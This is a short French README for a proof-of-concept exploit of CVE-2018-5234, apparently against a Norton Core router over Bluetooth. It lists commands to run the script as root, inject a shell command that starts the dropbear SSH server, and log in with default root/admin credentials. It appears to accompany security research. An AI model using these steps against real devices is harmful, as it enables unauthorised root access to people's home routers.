
Exploit PoC pour CVE-2018-5234
Pour plus d'informations, lisez paper.
Pour démontrer l'exploitation, nous utiliserons :
Afin d'utiliser le script, nous devrons installer toutes les dépendances à l'avance :
$ pip install -r ./requirements.txt
Avec l'aide des utilitaires BlueZ, nous devons nous assurer que le Bluetooth est activé et fonctionne correctement.
Redémarrez le routeur pour donner accès à la page d'ingénierie.
Lancez le PoC en tant qu'utilisateur root (nécessaire pour utiliser le Bluetooth) avec la commande à exécuter comme argument :
$ ./ble_norton_core.py "/etc/init.d/dropbear start"
Une fois le script exécuté avec succès, nous obtenons un accès au périphérique via une connexion SSH. Nous mettons root comme utilisateur et admin comme mot de passe :
$ ssh [email protected]